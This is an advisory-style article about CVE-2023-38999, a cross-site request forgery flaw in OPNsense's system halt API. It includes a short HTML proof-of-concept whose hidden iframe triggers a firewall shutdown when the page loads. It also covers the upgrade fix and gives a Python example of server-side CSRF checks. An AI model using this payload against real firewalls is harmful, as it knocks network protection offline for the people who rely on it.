A recent security update has uncovered a Cross-Site Request Forgery (CSRF) vulnerability in the System Halt API (/system/halt) of OPNsense, a widely used open-source firewall and security platform. The vulnerability, designated CVE-2023-38999, affects OPNsense versions prior to 23.7. An attacker can exploit it to cause a Denial of Service (DoS) via a specially crafted GET request. This article covers the vulnerability details, a code snippet of the exploit, and the original references for this bug.

CVE Details

---
CVE-ID: CVE-2023-38999
Affected Systems: OPNsense before 23.7
Severity: Medium
Impact: Denial of Service (DoS)
Attack Vector: Cross-Site Request Forgery (CSRF) via the System Halt API

Vulnerability Description

---
The OPNsense System Halt API is responsible for shutting down the system when a user initiates the halt command. However, due to insufficient protections against CSRF attacks, a malicious party can use a crafted GET request to trigger the API, resulting in the system halting and causing a denial of service for legitimate users.

Code Snippet

---
The following code snippet demonstrates the exploit utilizing a simple HTML file to initiate a GET request via a hidden iframe:

```html
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2023-38999 Exploit Example</title>
  <script>
    function exploit() {
      // Loading this URL in the hidden iframe makes the victim's browser issue the GET request.
      document.getElementById("exploitFrame").src = "http://opnsense.example.com/system/halt";
    }
  </script>
</head>
<body onload="exploit()">
  <h1>Trying to exploit CVE-2023-38999...</h1>
  <iframe id="exploitFrame" style="display: none"></iframe>
</body>
</html>
```

Once the attacker convinces the victim (i.e., someone with access to the OPNsense UI) to visit the above HTML file, the exploit() function runs and triggers the System Halt API. The firewall shuts down, which denies service to its legitimate users.

Mitigation

---
The vulnerability is fixed in OPNsense version 23.7. Users should update their OPNsense systems to the latest version by following the official upgrade guide: https://docs.opnsense.org/manual/install.html#upgrade
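
For readers who maintain their own web applications, the sketch below shows the kind of server-side check that stops a forged halt request like the one in the proof-of-concept page above. It is an added example, not OPNsense's code or its actual fix; the function name, the `x-csrf-token` header and the sample requests are assumptions constructed for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # must never change state


def check_state_change(method, headers, session_token, expected_host):
    """Return (allowed, reason) for a request to a state-changing route
    such as /system/halt. Header names are expected lower-cased."""
    # 1. An <iframe> or <img> load is always a GET, so refusing safe
    #    methods already blocks the request the PoC page generates.
    if method.upper() in SAFE_METHODS:
        return False, "method-not-allowed"
    # 2. Browsers attach Origin to cross-site POSTs; fall back to Referer.
    source = headers.get("origin") or headers.get("referer")
    if source and urlsplit(source).netloc.lower() != expected_host.lower():
        return False, "cross-origin"
    # 3. Per-session token (hypothetical header name) that a foreign page
    #    cannot read or guess, compared in constant time.
    sent = headers.get("x-csrf-token", "")
    if not session_token or not hmac.compare_digest(
            sent.encode(), session_token.encode()):
        return False, "bad-csrf-token"
    return True, "ok"


def demo():
    host = "opnsense.example.com"      # host name used in the PoC above
    token = secrets.token_urlsafe(32)  # constructed session token
    good = "http://" + host
    # Constructed sample requests: (method, lower-cased headers).
    cases = {
        "iframe GET": ("GET", {"referer": "http://attacker.example/p.html"}),
        "cross-site POST": ("POST", {"origin": "http://attacker.example"}),
        "wrong token": ("POST", {"origin": good, "x-csrf-token": "guess"}),
        "legitimate POST": ("POST", {"origin": good, "x-csrf-token": token}),
    }
    return {name: check_state_change(m, h, token, host)
            for name, (m, h) in cases.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Each layer covers a different gap: the method check defeats passive loads such as iframes, the origin check rejects forged cross-site form posts, and the token check still holds when neither Origin nor Referer is sent.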

Original References

---

The original references and sources for this vulnerability are cited below:

1. OPNsense Security Advisory: https://github.com/opnsense/core/security/advisories/GHSA-8597-3xh7-wprm
2. CVE Details - NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-38999
3. MITRE CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38999

Conclusion

---
Cross-Site Request Forgery vulnerabilities, like the one discussed in this article, can have severe consequences on the security and stability of any software system. By exploiting this vulnerability, an attacker may put the privacy and safety of the affected users at risk. It is essential to keep your systems up-to-date with the latest security patches and prioritize addressing known vulnerabilities.

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/15/2023 15:08:00 UTC